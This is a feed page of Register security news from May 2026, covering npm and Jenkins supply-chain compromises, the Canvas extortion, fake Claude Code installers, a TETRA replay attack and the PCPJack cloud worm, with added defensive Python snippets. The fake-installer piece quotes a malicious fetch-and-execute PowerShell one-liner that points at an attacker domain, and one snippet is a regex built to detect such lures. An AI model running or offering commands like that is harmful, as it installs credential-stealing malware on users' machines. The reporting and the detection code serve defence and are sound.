News

US bank reports itself after slinging customer data at 'unauthorized AI app'

The Register - 7 min 16 sec ago
A US commercial bank just tattled on itself to the Securities and Exchange Commission (SEC) for plugging a bunch of customer data into an unauthorized AI application. Community Bank, which operates in southwestern Pennsylvania, Ohio, and West Virginia, filed an 8-K with the regulator on Monday, saying it launched an investigation into the internal cockup, which remains ongoing. It felt compelled to submit the filing "due to the volume and sensitive nature of the non-public information." This included customer names, dates of birth, and Social Security numbers, but the filing provided no further detail about the incident. Community Bank did not specify what this "unauthorized AI-based software application" was or how it was used. However, data such as SSNs, which in the US are generally categorized among the most sensitive types of information that organizations can store on behalf of customers, is protected under several federal and state laws. One possibility is that the data was entered into a generative AI tool outside the bank's approved systems. If so, that could raise questions about whether the information was transmitted to a third-party provider and how it may have been retained or processed. The Register asked Community Bank for more details and will update this story if it responds. The bank confirmed that it suffered no operational impact and that customers were not prevented from accessing their accounts or payment services as a result. "The company is evaluating the customer data that was affected and is conducting notifications as required by applicable federal and state laws and regulatory guidance," Community Bank stated in its cybersecurity disclosure. "The company has been, and continues to be, in communication with relevant banking and financial regulators regarding the incident."
It also promised to continue its remediation efforts, take action to prevent future failures, and gave the "we're committed to protecting customers' data" line that always goes down so well. ®
Categories: News

Cache-poisoning caper turns TanStack npm packages toxic

The Register - 2 hours 57 min ago
An attacker has published 84 malicious versions of official TanStack npm packages, with impacts including credential theft, self-propagation, and a complete disk wipe of an infected host. The attack is part of a broader wave across npm and PyPI, continuing the Mini Shai-Hulud campaign. Supply chain security company Socket reports that other compromised packages include the OpenSearch client, Mistral AI, UiPath, and Guardrails AI. Malicious npm packages for TanStack, an open source application stack, were published between 19:20 and 19:26 UTC on May 11. The attack was detected and reported within 30 minutes by StepSecurity, triggering incident response and npm deprecation. GitHub published a security advisory at 21:30 UTC, including a list of affected packages. TanStack founder Tanner Linsley published a postmortem describing how the attacker used a malicious commit on a fork to create a pull request on the TanStack repository, causing scripts to auto-run and build the malware. This poisoned the GitHub Actions cache in what Linsley said is a variant of a known GitHub Actions vulnerability discovered in 2024. The malware then extracted the npm OpenID Connect (OIDC) token, used for trusted npm publishing, from runner memory using the same code used to compromise tj-actions in an attack last year. No TanStack maintainers were compromised. StepSecurity has a detailed analysis of the attack, noting that the payload "reads files from over 100 hardcoded paths" including those that may contain cloud credentials, SSH (secure shell) keys, developer tool configuration files, crypto wallets, VPN configurations, messaging credentials, and shell history. Shell history may contain tokens and passwords pasted into the terminal. Security researcher Nicholas Carlini warned that the payload "installs a dead-man's switch… as a system user service." The service checks whether a stolen GitHub token has been revoked and, if it has, runs a command to wipe the local disk completely.
Socket's write-up includes recommended actions such as rotating all secrets on any affected system. GitHub's advisory suggests "any developer or CI environment that ran npm install, pnpm install, or yarn install against an affected version on 2026-05-11 should be considered compromised." The Mistral AI compromise has also been reported on GitHub, and at the time of writing, the Mistral AI project is quarantined on PyPI. This attack is still evolving and will likely have a far-reaching impact. It confirms again that running everyday commands like npm install is unsafe, that for all their efforts major package repositories including npm and PyPI are still not secure, and that software development is now best done in isolated, ephemeral environments. ®
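For teams wanting a quick first pass at exposure, a lockfile can be screened offline against the advisory's list of bad versions. Here is a minimal Python sketch using a hypothetical package name and version for illustration; the real affected list lives in GitHub's security advisory, not here:

```python
import json

# Hypothetical name/version pairs for illustration only; substitute the
# real list from GitHub's security advisory for the incident.
BAD_VERSIONS = {
    ("@tanstack/example-pkg", "9.9.9"),
}

def audit_lockfile(lock_path, bad=BAD_VERSIONS):
    """Return (name, version) pairs from an npm v2/v3 package-lock.json
    that appear on a known-bad list. Keys in the "packages" map look
    like "node_modules/<name>" (possibly nested)."""
    with open(lock_path) as f:
        lock = json.load(f)
    hits = []
    for path, meta in lock.get("packages", {}).items():
        if not path:  # the empty key "" is the root project itself
            continue
        name = path.split("node_modules/")[-1]
        if (name, meta.get("version")) in bad:
            hits.append((name, meta.get("version")))
    return hits
```

This only catches exact matches recorded in the lockfile; it says nothing about what an already-executed install script may have done, so secret rotation is still the priority.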
Categories: News

Apple, Google drag cross-platform texting into the encrypted age

The Register - 5 hours 11 min ago
Apple and Google have taken a big step toward securing cross-platform texting, ending years of messages bouncing around in glorified plaintext. Apple announced this week that encrypted Rich Communication Services (RCS) messaging is rolling out in beta for iPhone users running iOS 26.5 and Android users on the latest version of Google Messages. The feature works across supported carriers and adds end-to-end encryption to cross-platform chats that were still taking the scenic route through carrier-era messaging infrastructure. Users will know it's enabled when a lock icon appears in RCS conversations. Apple says E2EE RCS messages cannot be read while traveling between devices, bringing Android-to-iPhone chats closer to the protections offered by WhatsApp and Signal. The move lands as other platforms head in the opposite direction. Earlier this month, Meta confirmed it was backing away from parts of its encryption rollout for Instagram DMs, telling The Register that "very few" people actually used the feature and suggesting privacy-minded users head over to WhatsApp instead. Apple, meanwhile, appears content to lean harder into the privacy angle, finally plugging one of the more obvious holes in modern messaging security. That gap has been hanging around for years. While iMessage chats between Apple devices were already encrypted, conversations involving Android phones could fall back to SMS or unencrypted RCS, depending on carrier support. Google had offered encrypted RCS chats inside Google Messages for years, but only when both sides used Google's ecosystem. Apple joining the party means cross-platform RCS encryption is finally starting to span the two largest mobile ecosystems. The rollout is still marked as beta, and carrier support varies by region, so not everyone will get encrypted chats immediately. UK availability remains unclear for now, as none of the major UK networks currently appear on Apple's published compatibility lists for the feature. 
Still, after two decades of the mobile industry insisting that interoperability and security could not coexist, cross-platform texting may finally be catching up with the rest of modern messaging. ®
Categories: News

Japan’s PM orders cybersecurity review to stop Mythos going full CyberZilla

The Register - 9 hours 17 min ago
Japan’s prime minister Sanae Takaichi has ordered a review of government cybersecurity strategy, citing the arrival of Anthropic’s bug-hunting model Mythos as a moment that makes a cabinet-level project necessary. In a Tuesday cabinet meeting, the PM instructed cybersecurity minister Hisashi Matsumoto to devise measures to check the state of government systems to determine whether it’s possible to detect and fix vulnerabilities, and to develop a plan to ensure critical infrastructure operators can do likewise. Japan’s leader ordered the checks because she feels Mythos and similar frontier models may be misused, and that attacks on infrastructure may therefore increase in speed and scale – perhaps even exponentially. Over the last couple of years cybersecurity vendors and researchers have often pointed out that AI models make it possible to find flaws and automate attacks. When Anthropic debuted Mythos in early April, the notion that AI has the potential to vastly complicate the security landscape went mainstream. Many regulators around the world have issued guidance to point out that now is the perfect time to revisit and improve security strategies and capabilities, because Mythos and other AI models mean defenses are going to be tested like never before. India’s securities regulator went a step further by ordering a security review at the organizations it oversees. And now Japan’s leader has decided the matter is of sufficient importance that her office needs to weigh in and set new policy to ensure AI doesn’t go on a destructive rampage through Japanese infrastructure. Whether Takaichi’s urgency is needed is open to debate. Some researchers have said that while Mythos can find bugs at speed, it doesn’t find flaws humans can’t detect with their naked brains. Others suggest Mythos is not vastly better at finding bugs than open source models that pre-date it and are publicly available – unlike Mythos, which is restricted to certain users.
Others have all but dismissed Mythos as a marketing stunt. ®
Categories: News

Double Canvas breach acknowledged as ShinyHunters sets new pay-or-leak deadline

The Register - 15 hours 41 min ago
Ed-tech giant Instructure confirmed two rounds of unauthorized activity affecting its online learning platform Canvas within two weeks as data-theft-and-extortion crew ShinyHunters threatened to leak data it claims belongs to more than 275 million students, teachers, and staff tied to nearly 9,000 schools worldwide. In a security incident update, Instructure apologized for the disruption when Canvas went offline last Thursday, leaving thousands of colleges, universities, and K-12 schools without access to course materials, grades, and due dates during final exams and, for many, Advanced Placement testing. As of Saturday, the parent company claimed, “Canvas is fully back online and available for use.” And it finally broke its silence on Monday about what happened, admitting not one but two intrusions after criminals exploited a security vulnerability in its Free-for-Teacher learning system, and saying the data thieves stole information including usernames, email addresses, course names, enrollment information, and messages. “Core learning data (course content, submissions, credentials) was not compromised,” the Monday disclosure said. “We're still validating all findings, but we want to be clear about what we understand was and wasn't affected.” On April 29, the online education firm “detected unauthorized activity in Canvas,” immediately revoked the intruder’s access, and initiated a probe into the breach, according to Instructure’s notice posted on its website. On May 7, the company “identified additional unauthorized activity tied to the same incident.” ShinyHunters defaced about 330 Canvas school login portals, also exploiting the same Free-for-Teacher vulnerability, and that caused the ed-tech firm to take Canvas offline and “into maintenance mode to contain the activity.” ShinyHunters claims it stole 3.65 TB of data, including about 275 million records from about 8,800 schools including Harvard, Columbia, Rutgers, Georgetown, and Stanford universities.
After moving the pay-or-leak deadline multiple times, ShinyHunters set a final deadline of end-of-day May 12 for individual institutions to contact them directly to negotiate payment - or the group will publish the full dataset. In response, Instructure said it temporarily shut down its Free-for-Teacher accounts. It also revoked privileged credentials and access tokens tied to compromised systems, rotated internal keys, restricted token creation pathways, and added monitoring across all platforms. The education platform hired CrowdStrike to assist with its forensic analysis and incident response, and said it also notified the FBI - which published its own alert on social media - and the US Cybersecurity and Infrastructure Security Agency. This is Instructure’s second breach in less than a year. ShinyHunters claimed to have breached Instructure's Salesforce environment in September 2025, and while Instructure didn’t name the crew in its latest disclosure, it did address the intrusion. “The prior Salesforce-related incident and this Canvas security incident are distinct events involving different systems and circumstances,” the company said. ®
Categories: News

Cookie thieves caught stealing dev secrets via fake Claude Code installers

The Register - Mon, 11/05/2026 - 21:21
An ongoing campaign steals developers’ secrets via fake Claude Code installers and other popular coding tools, according to Ontinue’s security researchers. The lure - as with several other infostealer attacks targeting developers over the past several months - mimics a legitimate one-line installer while substituting an attacker-controlled command. In this case, the legitimate command is “irm https[:]//claude[.]ai/install.ps1 | iex”, and the lure replaced the destination host, yielding “irm events[.]msft23[.]com | iex”. The payload is unique and doesn’t match up with any documented malware family. It does, however, wreak havoc on developers, exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. According to the threat hunters who documented the new campaign on Monday: “We publish for peer correlation rather than attribution.” The attack also abuses the IElevator2 COM interface. This is Chromium’s elevation service used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who used earlier ABE bypass techniques and commodity stealers that file-copied the SQLite databases holding cookies and saved passwords. However, crafty crooks (and security researchers) soon figured out workarounds to abuse IElevator2, as is the case with the newly spotted malware. The attack runs across three domains, all registered within six days of each other in April, and all fronted through Cloudflare. It relies on developers searching for “install claude code,” and selecting a sponsored result that leads to a lookalike Claude Code installation page.
The page downloads and executes Anthropic’s authentic installer - but as Ontinue’s team found, the malicious instruction isn’t stored in the file itself, but instead rendered into the HTML of the landing page. “Automated scanners, URL reputation services, and any skeptical reviewer who simply curls the URL therefore observe clean PowerShell delivered from a Cloudflare-fronted domain bearing a valid Let’s Encrypt certificate,” the researchers wrote. “Victims, meanwhile, are presented with an entirely different command.” The pasted command redirects victims to an obfuscated PowerShell loader that injects a native ABE helper into a live browser process. The helper’s “exclusive purpose,” we’re told, is to invoke the browser's IElevator2 COM interface and recover the App-Bound Encryption key. The helper creates a pipe for exfiltrating sensitive data, named according to Chromium’s legitimate Mojo convention for IPC pipes. It then attempts to use IElevator2 to decrypt developer secrets, falling back to the legacy IElevator interface on the Elevation Service if the new one doesn’t work. Ontinue’s researchers published a full list of elevation-service identifiers, so be sure to check that out. And after receiving the ABE key from the helper, the PowerShell loader decrypts the local browser databases and sends the stolen data to an attacker-controlled server via an in-memory secure_prefs.zip archive. The malware hunters say that they compared the malware against published reporting for several stealers - including Lumma, StealC, Vidar, EddieStealer, Glove Stealer, Katz Stealer, Marco Stealer, Shuyal, AuraStealer, Torg Grabber, VoidStealer, Phemedrone, Metastealer, Xenostealer, ACRStealer, DumpBrowserSecrets, DeepLoad, and Storm - and found no technical match. The closest is Glove Stealer, first documented by Gen Digital in November 2024, which also abuses IElevator via a helper module communicating over a named pipe.
The orchestration model, however, differs from Glove in that it uses a “small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell.” This split matters for defenders, the research team wrote, because “behavioral rule sets that look at the native PE in isolation will see nothing actionable. Detection has to land at the COM call and at the PowerShell layer.” ®
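The cloaking described above also suggests a cheap screening heuristic: extract any "irm … | iex" one-liner a page actually displays and check its host against the vendor's documented install domain. A rough Python sketch follows; the allowlist here is an assumption for illustration, not an official list, and the regex only catches this one lure shape:

```python
import re

# Assumption for illustration: the vendor's documented install host.
OFFICIAL_HOSTS = {"claude.ai"}

# Match PowerShell one-liners of the form "irm <url> | iex" and capture
# the host portion of the URL.
CMD_RE = re.compile(r"irm\s+https?://([^/\s|]+)[^|]*\|\s*iex", re.IGNORECASE)

def suspicious_install_commands(html):
    """Return (command, host) pairs for any 'irm ... | iex' one-liner
    found in page text whose host is not on the expected allowlist."""
    hits = []
    for m in CMD_RE.finditer(html):
        host = m.group(1).lower()
        if host not in OFFICIAL_HOSTS:
            hits.append((m.group(0), host))
    return hits
```

Note this has to run against the rendered page, not a curl of the URL - which is exactly the blind spot the researchers describe.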
Categories: News

Anthropic’s bug-hunting Mythos was greatest marketing stunt ever, says cURL creator

The Register - Mon, 11/05/2026 - 17:30
cURL developer Daniel Stenberg has seen Anthropic’s Mythos, a model the AI biz has suggested is too capable at finding security holes to release publicly, scan his popular open source project. But after the system turned up just a single vulnerability, he concluded the hype around Mythos was “primarily marketing” rather than a major AI security breakthrough. Stenberg explained in a Monday blog post that he was promised access to Anthropic’s Mythos model - sort of - through the AI biz’s Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl’s codebase and later sent him a report. “It’s not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway,” Stenberg explained. “Getting the tool to generate a first proper scan and analysis would be great, whoever did it.” That scan, which analyzed curl’s git repository at a recent master-branch commit, was sent back to him earlier this month, and it found just five things that it claimed were “confirmed security vulnerabilities” in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report “felt like nothing,” and that feeling was further validated by a review of Mythos’ findings. “Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability,” Stenberg said, bringing us back to the aforementioned number. As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug. 
“The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync with our pending next curl release 8.21.0 in late June,” the cURL meister noted. “The flaw is not going to make anyone grasp for breath.” That said, Mythos did find several other non-security bugs that Stenberg said the team is working on fixing, and he notes that their description and explanation were well done. Mythos can do good work, in other words, but it’s not the ground-breaking, game-changing AI model Anthropic has claimed. “My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing,” Stenberg said in the blog post. “I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos.”

cURL code is no stranger to AI

To say cURL has become widely used in its nearly three decades of existence would be an understatement. Its wide reach has meant that its team has been running it through all sorts of static code analyzers and fuzz tests since well before the dawn of the AI age. With AI’s rise, the cURL team has adapted, meaning Mythos is hardly the first AI to get its fingers on cURL’s codebase. “These tools and the analyses they have done have triggered somewhere between two and three hundred bugfixes merged in curl throughout the recent 8-10 months or so,” Stenberg said of tools like AISLE, Zeropath, and OpenAI Codex Security that’ve tested cURL code. “A bunch of the findings these AI tools reported were confirmed vulnerabilities and have been published as CVEs. Probably a dozen or more.” Stenberg’s experience with AI testing cURL, in other words, makes it a great candidate for seeing whether Mythos can really find more than the average AI.
As Stenberg noted elsewhere in his blog post, Mythos isn’t doing anything particularly novel when it comes to security discoveries: It might be a bit better at finding things than previous models, but “it is not better to a degree that seems to make a significant dent in code analyzing,” the cURL author noted. Stenberg isn’t an AI doomer when it comes to the technology’s ability to improve software design, though. Yes, he may have closed the cURL bug bounty earlier this year due to an influx of sloppy, useless bug reports, but he also noted a few months prior to the bounty closure that some security researchers assisted by AI have made valuable reports. “AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past,” Stenberg said, adding an important qualifier for the Mythos moment: “All modern AI models are good at this now.”

Mythos isn’t any more creative than its creators

Both older AI models and security-focused tools like Mythos have a common limitation, as far as Stenberg is concerned: they’re only as good at finding security vulnerabilities as the humans who programmed them. “AI tools find the usual and established kind of errors we already know about. It just finds new instances of them,” Stenberg said. “We have not seen any AI so far report a vulnerability that would somehow be of a novel kind or something totally new.” As for Mythos, Stenberg remains unimpressed, calling it "an amazingly successful marketing stunt for sure" in his blog post. In an email to The Register, Stenberg admitted that it’d be possible for AI models to actually discover new, novel types of vulnerabilities, but he’s still not convinced that they can go beyond what humans are capable of finding, given that they’re limited by our understanding of how software vulnerabilities work. At the end of the day, Stenberg explained, when we talk about security, we’re only talking about code.
“Source code is text and it feels like maybe we already know about most ways we can do security problems in it,” he pondered in his email. In other words, like the valuable AI-assisted reports made to the cURL bug bounty program before its closure due to a flood of AI garbage, making valuable use of systems like Mythos is going to require humans to get creative. Sorry, no foisting your critical thinking onto a bot. “Human researchers have always used tools when they look for security problems,” Stenberg told us. “Adding AIs to the mix gives the humans even more powerful tools to use, more ways to find problems. I expect that many security bugs going forward will be found by humans coming up with new ways and angles of prompting the AIs.” Stenberg said that he hopes he’ll actually get his hands on Mythos so he can experiment with its capabilities, but he doesn’t seem to be holding out hope the promised access will materialize. “I have been promised access and for all I know I will eventually get it,” Stenberg told us. “I just don't know when.” ®
Categories: News

BWH Hotels guests warned after reservation data checks out with cybercrooks

The Register - Mon, 11/05/2026 - 15:34
BWH Hotels is informing customers about a third-party data breach that gave cybercriminals access to six months' worth of data. The notification email stated that BWH Hotels, which owns the WorldHotels, Best Western Hotels & Resorts, and Sure Hotels brands, identified the intrusion on April 22, but the affected data goes back to October 14, 2025. BWH Hotels CTO Bill Ryan, who penned the notification email, said names, email addresses, telephone numbers, and/or home addresses belonging to "certain guests" were accessed by an unauthorized third party. The intruders also accessed reservation details, such as reservation numbers, dates of stay, and any special requests. It confirmed that the attack targeted one of its "web applications that houses certain guest reservation data." No payment or bank details were involved. The Register asked BWH Hotels whether the intrusion began in October and went undetected until April, or whether a later breach exposed data dating back to October. We also asked if this was related to information we were sent in March about BWH Hotel customer booking data being stolen and used for phishing campaigns. At the time, the company neither confirmed nor denied the information seen by The Register. BWH Hotels did not immediately respond to our request for comment on Monday. "Upon discovering the incident, we immediately took the application offline and revoked the unauthorized access," said Ryan. "We have engaged leading external cybersecurity experts to support our incident response efforts and to assist with the further strengthening of existing safeguards." "We advise guests to be extra vigilant when viewing any unexpected or suspicious communications about hotel stays. If you receive a suspicious communication such as an unexpected email, text, WhatsApp message, or telephone call that asks for payment, codes, logins, or 'verification,' even if they reference a BWH Hotels property or an upcoming reservation, do not engage. 
Navigate to sites directly rather than clicking links." ®
Categories: News

Checkmarx tackles another TeamPCP intrusion as Jenkins plugin sabotaged

The Register - Mon, 11/05/2026 - 13:11
Checkmarx’s software engineers are still working to remove a malicious version of the code security outfit's Jenkins plugin after detecting an unauthorized upload over the weekend. It updated customers on Saturday, May 9, after discovering a modified version of its AST Scanner, which is used for security scans in Jenkins CI pipelines, had been made available via the Jenkins Marketplace. “We are aware that a modified version of the Checkmarx Jenkins AST plugin was published to the Jenkins Marketplace,” it said in a statement. “We are in the process of publishing a new version of this plug-in.” Versions published as of May 9, 2026, should not be trusted, it added, before urging all users to check they’re running the correct release (2.0.13-829.vc72453fa_1c16) published on December 17, 2025. The plugin, installed by several hundred controllers, remains available at the time of writing, with the malicious release appearing as the most recent version, although pull requests actioned on Monday morning suggest it will soon be pulled down. “What makes this particularly dangerous for Jenkins users is the trust model at play,” said SOCRadar in its coverage. “The Checkmarx Jenkins plugin is a tool people install specifically to improve the security of their pipelines. “A backdoored version doesn’t just compromise one project; it rides trusted infrastructure into every build pipeline it touches, with access to source code, environment variables, tokens, and whatever secrets the runner can see.” Security engineer Adnan Khan spotted the compromise quickly over the weekend. The crew behind the earlier supply chain attack affecting Checkmarx in April, TeamPCP, defaced the company’s GitHub and published six packages, each with a description alluding to the Shai-Hulud wormable malware.
These packages no longer appear on Checkmarx’s GitHub, but TeamPCP made multiple changes to the AST plugin's page, renaming it to “Checkmarx-Fully-Hacked-by-TeamPCP-and-Their-Customers-Should-Cancel-Now,” and altering the description to claim Checkmarx failed to rotate its secrets. The latest infiltration of Checkmarx’s internals marks the third time TeamPCP has compromised the company’s packages in as many months. As The Register previously reported, the crooks successfully targeted Checkmarx’s AST plugin for GitHub Actions and its KICS static analysis tool back in March, deploying credential-stealing malware. SOCRadar said the latest TeamPCP compromise of the Jenkins plugin suggests that either TeamPCP was telling the truth about Checkmarx’s secrets rotation, or its members took advantage of an additional persistence mechanism that the security vendor failed to notice during its response to the March intrusion. ®
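Checkmarx's advice to verify the installed release can be scripted against Jenkins' plugin-manager API (`/pluginManager/api/json?depth=1`). A minimal sketch follows; the plugin short name used here is an assumption for illustration, not something confirmed by the advisory, so adjust it to whatever your controller reports:

```python
import json
import urllib.request

SAFE_VERSION = "2.0.13-829.vc72453fa_1c16"  # the release Checkmarx says to trust
PLUGIN_ID = "checkmarx-ast-scanner"         # assumption: the plugin's short name

def flag_plugin(plugins, plugin_id=PLUGIN_ID, safe_version=SAFE_VERSION):
    """Given the 'plugins' list from Jenkins' plugin-manager API, return
    the installed version if it differs from the known-good release, or
    None if it matches or the plugin isn't installed."""
    for p in plugins:
        if p.get("shortName") == plugin_id:
            version = p.get("version")
            return None if version == safe_version else version
    return None

def check_jenkins(base_url, auth_header):
    """Fetch installed plugins from a Jenkins controller and flag the
    Checkmarx plugin if its version is unexpected."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/pluginManager/api/json?depth=1",
        headers={"Authorization": auth_header},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        data = json.load(resp)
    return flag_plugin(data["plugins"])
```

A non-None return means the controller is running something other than the December 17 release and warrants the full secret-rotation treatment.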
Categories: News

Taiwan's train cyber-trauma reveals a global system that’s coming off the tracks

The Register - Mon, 11/05/2026 - 09:30
OPINION There are three little words to make the heart beat faster in anyone who knows what they mean: critical infrastructure resilience. If you run that infrastructure or a country dependent on it, you need energy, communication and transport to be impregnable to cyber attacks. This is doubly so if that country is five minutes by incoming missile from an implacable hyper-competent enemy sworn to invade you. One that is building and equipping its military as fast as it can with this one thing in mind. One with the most invasive and brazen state hacking machinery on the planet. Thus it was a very bad day indeed when Taiwan’s entire bullet train system was disabled for nearly an hour by an unknown attacker. It got even worse when that attacker turned out not to be the implacable and hyper-resourced state actor over the Taiwan Strait, but a university student with a yen for radio and some kit he bought online. On the one hand, it’s good to see the grand tradition of young hackers causing havoc from their bedrooms remains in good repair. On the other, WTRF? The information released by the Taiwanese authorities is scant on details, but enough to be pretty sure what actually happened. It’s bad news not just for Taiwan but for more than 100 countries that also use the TETRA two-way radio standard involved, often for emergency services. In many cases, it was the default replacement for unencrypted FM two-way radios, adding encryption, flexibility and network security. These were state of the art when TETRA was developed in the 1980s and 1990s - and work as well in 2026 as you might expect. Oops. There have been upgrades and, especially after the 2023 vulnerability disclosures, an accelerated program of making things better. A lot of the installed base globally is old, lacks over-the-air updates for security, and in any case spending money on new radios is normally at the bottom of the list for any state or public service organization. Things have to get really bad first.
Perhaps they just have. (North America is the only region where TETRA is uncommon, as it isn’t approved for public service use. This was either acute foresight or the fact that the TE in TETRA, now officially TErrestrial, used to stand for Trans-Europe. The American system, P25, has never, however, been renamed Freedom Frequencies. Now on with the show) The network vulnerabilities are one side of the story. Our doughty hacker is the other. Reportedly, he didn’t have any TETRA hardware, but a laptop connected to a radio and an ‘SDR filter’. The latter makes little sense; it is far more likely that he had a software defined radio (SDR) called a HackRF. There are plenty of other devices that could have been used, but the HackRF is the weapon of choice for the gung-ho radio nut. SDR is a technique that has completely changed the rules of how to radio. All radios before it had to be entirely or mostly analog, with precision hardware dedicated to whatever job each radio had to do. This hardware could also be looked at as an analog computer, as it can be modelled as a set of mathematical transformations on the received signal. Analog computers have their place, just not in the 21st century. SDR is radio as digital computer. At heart, it has three components: an analog-to-digital converter to turn the incoming signal into a stream of numbers, very fast processing to do the radio math, and a digital-to-analog converter to play the results. What you get is triply terrific. Digital processing is perfect; analog processing adds noise and distortion. Nothing is fixed, everything can be re-engineered with new code. And it can be hog-whimperingly cheap. HackRF is all those things and more. It can be configured as a portable touch-screen device. It transmits and receives from DC to daylight. You can pick one up for less than the price of a mid-range mobile. It is open source. It works with all manner of SDR creation tools, utilities and radio packages.
There are infinite legitimate uses. Most excitingly, you can download apps for it that do everything, most especially the kind of thing that will introduce you with surprising rapidity to a wide range of new friends with no sense of humor, bearing love letters that look suspiciously like arrest warrants. Think of it as speed dating, but with more guns and fewer no-thank-yous. GPS spoofing, aviation and marine location transponders, satellite comms, data eavesdropping and injection - take your pick. You’ll need it to unlock the cell door. It is the data detection and injection that seems to have been the downfall of all concerned. A handset had its transmission decoded, and the result was retransmitted into the system as if it came from that original radio. Whether the decoded data already had the General Alarm set, or whether the data had to be modified before retransmission, is not yet known. Doesn’t matter. It’s called a replay attack, and it has mostly been, and still is, used in stand-alone devices called code grabbers to unlock and steal expensive cars with wireless keys. Some countries, including Canada and the UK, have banned code grabbers, but this has failed on two counts. Code grabbers are small gadgets that can be bought online from China, and good luck policing that. Also, thieves are notably indifferent to laws. That notwithstanding, the UK is thinking of extending the ban to other classes of naughty wireless, and would doubtless like to do the same with HackRF, at least as of last week. Of course, it can’t be banned. SDRs can’t be banned as a class, especially open source ones made out of standard chips and open code. They are general purpose computers, albeit with specialisms. It doesn’t matter if you’re dismayed or delighted that things like HackRF exist; that genie is out of the bottle. What is truly dismaying is that replay attacks are a solved problem, trivially so. Choose a big keyspace, randomize, and never repeat keys. 
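That prescription - a big keyspace and never-repeated keys - is what rolling codes implement. A minimal sketch in Python, assuming a shared secret and a strictly increasing counter (all names are illustrative; this is the general technique, not any real keyfob or TETRA protocol):

```python
import hashlib
import hmac
import secrets

class RollingCodeReceiver:
    """Toy receiver that rejects any replayed transmission."""

    def __init__(self, key: bytes):
        self.key = key
        self.counter = 0  # highest counter value accepted so far

    def expected(self, counter: int) -> bytes:
        # Each counter value maps to a unique, unforgeable code.
        return hmac.new(self.key, counter.to_bytes(8, "big"), hashlib.sha256).digest()

    def accept(self, counter: int, code: bytes) -> bool:
        # Replayed counters can never succeed: they are <= the last accepted one.
        if counter <= self.counter:
            return False
        if not hmac.compare_digest(code, self.expected(counter)):
            return False
        self.counter = counter
        return True

key = secrets.token_bytes(32)
rx = RollingCodeReceiver(key)
code = hmac.new(key, (1).to_bytes(8, "big"), hashlib.sha256).digest()
assert rx.accept(1, code)       # genuine first transmission: accepted
assert not rx.accept(1, code)   # identical retransmission: rejected
```

A code grabber records a valid transmission, but against this scheme the recording is worthless the moment the legitimate device uses that counter value.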
That one is on lazy car makers and, apparently, the world of TETRA. Fixing that class of lazy, outdated security vulnerability will be very expensive. Embedded systems are like that, especially old ones. Not fixing it will be a gamble with infinite downside, in a world where electronic warfare systems that used to cost hundreds of millions now pour out of AliExpress for a few bucks. HackRF is to TETRA as Crocodile Dundee’s knife is to the mugger’s. Critical infrastructure resilience. Just three little words, but if you say them you’d better mean it. And it won’t be cheap. ®
Categories: News

Worm rubs out competitor's malware, then takes control

The Register - Fri, 08/05/2026 - 18:26
There’s a mysterious framework worming its way through exposed cloud instances removing all traces of TeamPCP infections, but it’s not benevolent by a long shot: Whoever is behind this bit of malware may be cleaning up after those who came before, but only so they can take their place. Discovered by security outfit SentinelOne’s SentinelLabs researchers and dubbed PCPJack for its habit of stealing previously compromised systems from TeamPCP, the worm was first spotted in late April by a Kubernetes-focused VirusTotal hunting rule. It stood out from known cloud hacktools, said SentinelLabs, because the first action it always takes is to eliminate tools associated with TeamPCP attacks. The script didn’t stop there, though. “We initially considered that this toolset could be a researcher removing TeamPCP’s infections,” SentinelLabs said. “Analysis of the later-stage payloads indicates otherwise.” “Analyzing this script led us to discover a full framework dedicated to cloud credential harvesting and propagating onto other systems, both internal and external to the victim’s environment,” SentinelLabs continued. In other words, this thing will harvest credentials from everywhere it can get its hands on, and then find new, unsecured cloud environments to spread itself to. TeamPCP came onto the scene late last year, and has since made a name for itself primarily by successfully compromising the Trivy vulnerability scanner. That act spread credential-harvesting malware which attackers then used to pivot to more valuable targets, and became one of the most notable supply chain attacks in recent memory. Unlike TeamPCP’s campaign, which relied on humans spreading compromised software, this one spreads of its own accord. Infections start when already-infected systems look for exposed services, including Docker, Kubernetes, Redis, MongoDB, and RayML, as well as exposed web applications. 
Once it finds a vulnerable environment, it runs a shell script on the target system that sets up an environment to download additional payloads and searches for TeamPCP processes and artifacts to kill. That part of the infection downloads the worm itself, along with modules to enable lateral movement, parse credentials and encrypt them for exfiltration, and scan the web for new environments to infect. From there, the worm goes to work with the second module in its kit, which conducts the actual credential theft. This portion of the infection targets environment variables, config files, SSH keys, Docker secrets, Kubernetes tokens, and credentials from a list of finance, enterprise, messaging, and cloud service targets so long that we recommend taking a look at it here, or just assuming whatever you’re using is probably being targeted. SentinelLabs noted that the lack of a cryptominer in the malware package is unusual, and said the particular services it targets suggest its goal is either to conduct its own spam campaigns and financial fraud with the stolen data, or to make the data it harvests available to those planning similar crimes. The worm's practice of removing TeamPCP files could be opportunistic, or could mean there’s drama going on in the cybercrime world. “We have no evidence to suggest whether this toolset represents someone associated with the group or familiar with their activities,” SentinelLabs noted. “However, the first toolset’s focus on disabling and replacing TeamPCP’s services implies a direct focus on the threat actor’s activities rather than pure cloud attack opportunism.” Because this is a worm relying on unsecured cloud and web app instances ripe for targeting, mitigation recommendations are pretty simple: Keep your cloud platforms secure, and ensure authentication is required even for instances of things like Docker and Kubernetes that aren’t exposed to the internet. ®
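Checking your own estate for the kind of unauthenticated Docker API this worm preys on takes only a few lines. A minimal audit sketch, stdlib only, assuming you probe only hosts you own: the Docker Engine API's /_ping endpoint answers 200 on any live daemon, so a credential-free 200 on TCP 2375 means the door is wide open.

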